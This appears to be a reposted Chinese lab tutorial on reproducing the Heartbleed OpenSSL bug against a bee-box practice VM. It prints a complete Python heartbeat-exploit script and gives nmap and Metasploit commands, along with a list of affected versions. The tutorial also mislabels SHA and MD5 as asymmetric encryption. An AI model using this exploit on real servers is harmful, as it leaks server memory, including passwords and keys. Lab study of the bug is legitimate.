OpenSSL心脏滴血漏洞（CVE-2014-0160）_openssl漏洞的原因是

作者：Li_阴宅 | 2024-06-21 00:50:20

踩

openssl漏洞的原因是

一、漏洞介绍

2014年，互联网安全协议OpenSSL被爆出存在一种十分严重的漏洞。
在黑客社区，被命名为“心脏滴血” ，黑客通过利用该漏洞，可以获取到%30开头的https网站的用户名和密码，漏洞还影响到使用OpenSSL加密的产品。

二、漏洞分析

OpenSSL是通过加密算法来保证数据通信的私密性。
加密算法：
对称加密算法（AES、DES、3DES）
非对称加密算法（RSA/DSA/SHA/MD5）
而OpenSSL是使用公开的非对称加密算法RSA来加密的。
此次漏洞的成因是OpenSSL Heartbleed模块存在一个BUG，当攻击者构造一个特殊的数据包，满足用户心跳包中无法提供足够多的数据会导致memcpy把SSLv3记录之后的数据直接输出，该漏洞导致攻击者可以远程读取存在漏洞版本的OpenSSL服务器内存中长达64K的数据。

三、漏洞测试

测试环境
攻击机：kali linux
IP：192.168.220.138
目标机：bee-box（bwap）
IP：192.168.220.160
查看目标机ip能与目标机ping通

使用靶机进行测试
靶机下载地址（beebox/bwapp）：
https://sourceforge.net/projects/bwapp/files/bee-box/bee-box_v1.6.7z/download

poc下载

https://github.com/decal/ssltest-stls.git
1

#代码如下
#!/usr/bin/python

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)

# Modified by Derek Callaway (decal@ethernet.org) to add STARTTLS protocols

# The authors disclaim copyright to this source code.

import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser

options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
options.add_option('-s', '--starttls', type='string', default='', help='STARTTLS protocol: smtp, pop3, imap, ftp, or xmpp')

def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')

hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

hb = h2bin('''
18 03 02 00 03
01 40 00
''')

def hexdump(s):
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
        print '  %04x: %-48s %s' % (b, hxdat, pdat)
    print

def recvall(s, length, timeout=4):
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time()
        if rtime < 0:
            return None
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata


def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        print 'Unexpected EOF receiving record header - server closed connection'
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        print 'Unexpected EOF receiving record payload - server closed connection'
        return None, None, None
    print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
    return typ, ver, pay

def hit_hb(s):
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print 'No heartbeat response received, server likely not vulnerable'
            return False

        if typ == 24:
            print 'Received heartbeat response:'
            hexdump(pay)
            if len(pay) > 3:
                print 'WARNING: server returned more data than it should - server is vulnerable!'
            else:
                print 'Server processed malformed heartbeat, but did not return any extra data.'
            return True

        if typ == 21:
            print 'Received alert:'
            hexdump(pay)
            print 'Server returned error, likely not vulnerable'
            return False

BUFSIZ = 1024

def main():
    opts, args = options.parse_args()

    if len(args) < 1:
        options.print_help()
        return

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    print 'Connecting...'

    s.connect((args[0], opts.port))

    if opts.starttls != '':
      print 'Sending STARTTLS Protocol Command...'

    if opts.starttls == 'smtp':
      s.recv(BUFSIZ)
      s.send("EHLO openssl.client.net\n")
      s.recv(BUFSIZ)
      s.send("STARTTLS\n")
      s.recv(BUFSIZ)

    if opts.starttls == 'pop3':
      s.recv(BUFSIZ)
      s.send("STLS\n")
      s.recv(BUFSIZ)

    if opts.starttls == 'imap':
      s.recv(BUFSIZ)
      s.send("STARTTLS\n")
      s.recv(BUFSIZ)

    if opts.starttls == 'ftp':
      s.recv(BUFSIZ)
      s.send("AUTH TLS\n")
      s.recv(BUFSIZ)

    if opts.starttls == 'xmpp': # TODO: This needs SASL
      s.send("<stream:stream xmlns:stream='http://etherx.jabber.org/streams' xmlns='jabber:client' to='%s' version='1.0'\n")
      s.recv(BUFSIZ)

    print 'Sending Client Hello...'

    s.send(hello)

    print 'Waiting for Server Hello...'

    while True:
        typ, ver, pay = recvmsg(s)
        if typ == None:
            print 'Server closed connection without sending Server Hello.'
            return
        # Look for server hello done message.
        if typ == 22 and ord(pay[0]) == 0x0E:
            break

    print 'Sending heartbeat request...'
    sys.stdout.flush()
    s.send(hb)
    hit_hb(s)

if __name__ == '__main__':
    main()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177

靶机设置
1、选择 heartbleed Vulnerability选项。
在这里插入图片描述 2、有提示端口信息和攻击测试脚本。
端口为8443

python脚本利用

1、使用nmap的ssl-heartbleed.nse脚本探测是否存在漏洞。

nmap -p 8443 --script ssl-heartbleed.nse 192.168.220.160
1

经过探测发现目标主机有该漏洞，接下来可以利用。
在这里插入图片描述
2、使用python编写的poc进行漏洞利用。
执行以下命令返回以下结果

python ssltest-stls.py 192.168.220.160 -p 8443
1

在这里插入图片描述
说明存在该漏洞，利用成功！
msf利用
1、启动msf控制台

2、设置模块

use auxiliary/scanner/ssl/openssl_heartbleed 
1

在这里插入图片描述
3、查看参数

4、设置参数

set RHOSTS 192.168.220.160 设置目标地址
set RPORT 8443 设置目标端口
set verbose 设置监听信息
1
2
3

在这里插入图片描述
5、攻击

攻击者可以追踪OpenSSL缓存中的64KB信息，耐心的拼凑出想要信息，危害比较大！！

检测技术

hhttps://github.com/decal/ssltest-stls.git
nmap ssl-heartbleed.nse 脚本检测
1
2

漏洞修补
受影响版本
OpenSSL 1.0.1
OpenSSL 1.0.1a ~OpenSSL 1.0.1f
OpenSSL Beta 1
OpenSSL 1.0.2
非受影响版本
OpenSSL 1.0.1 g
OpenSSL 1.0.0 branch
OpenSSL 0.9.8 branch

参考学习

http://www.broadview.com.cn/book/4850
https://www.freebuf.com/articles/people/194171.html
1
2

声明：本文内容由网友自发贡献，不代表【wpsshop博客】立场，版权归原作者所有，本站不承担相应法律责任。如您发现有侵权的内容，请联系我们。转载请注明出处：https://www.wpsshop.cn/w/Li_阴宅/article/detail/741432